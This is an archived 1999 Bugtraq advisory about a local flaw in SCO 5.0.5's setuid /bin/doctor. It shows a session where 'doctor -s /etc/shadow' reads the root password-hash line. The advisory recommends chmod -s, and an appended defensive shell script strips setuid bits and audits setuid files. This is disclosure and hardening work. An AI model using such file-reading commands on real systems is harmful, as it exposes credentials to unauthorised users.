[11759] in bugtraq
SCO 5.0.5 /bin/doctor local root compromise
daemon@ATHENA.MIT.EDU (Brock Tellier)
Wed Sep 8 22:12:51 1999
Message-Id: <041201bef65a$80544b10$3177a8c0@webley>
Date: Fri, 3 Sep 1999 17:20:17 -0500
Reply-To: Brock Tellier <btellier@WEBLEY.COM>
From: Brock Tellier <btellier@WEBLEY.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,

INFO:
There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example:
scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$
And so on.
FIX:
Just chmod -s until SCO comes out with a fix. Although I certainly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within.
Brock Tellier
Systems Administrator
Webley Systems
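The chmod -s workaround described in the post, as an added POSIX sh example that is not part of the original advisory: it strips the setuid/setgid bits from a named binary and verifies the result, and lists remaining setuid files under given directories so other privileged helpers can be reviewed. /bin/doctor is the path from the post; the function names and the temporary test files are my own.

```shell
#!/bin/sh
# Added example, not from the original advisory.
# Assumes a POSIX sh with test(1), chmod(1) and find(1).

# has_setuid PATH -> exit 0 when PATH carries the setuid bit
has_setuid() {
    [ -u "$1" ]
}

# strip_setuid PATH -> clear setuid and setgid bits, print one report line.
# Returns 0 on success or when nothing needed doing, 1 if PATH is missing,
# 2 if the bits could not be cleared (e.g. read-only filesystem).
strip_setuid() {
    path=$1
    if [ ! -e "$path" ]; then
        echo "missing: $path"
        return 1
    fi
    if ! has_setuid "$path"; then
        echo "ok: $path (no setuid bit)"
        return 0
    fi
    chmod u-s,g-s "$path" || { echo "FAILED: chmod on $path"; return 2; }
    if has_setuid "$path"; then
        # Re-check instead of trusting chmod's exit status alone.
        echo "FAILED: $path still setuid"
        return 2
    fi
    echo "fixed: $path (setuid bit removed)"
    return 0
}

# audit_setuid DIR... -> print every regular setuid file below DIR(s),
# staying on the same filesystem, for review against a known-good list.
audit_setuid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null
}

# Usage as a script: sh this_file.sh /bin/doctor
if [ -n "${1:-}" ]; then
    strip_setuid "$1"
fi
```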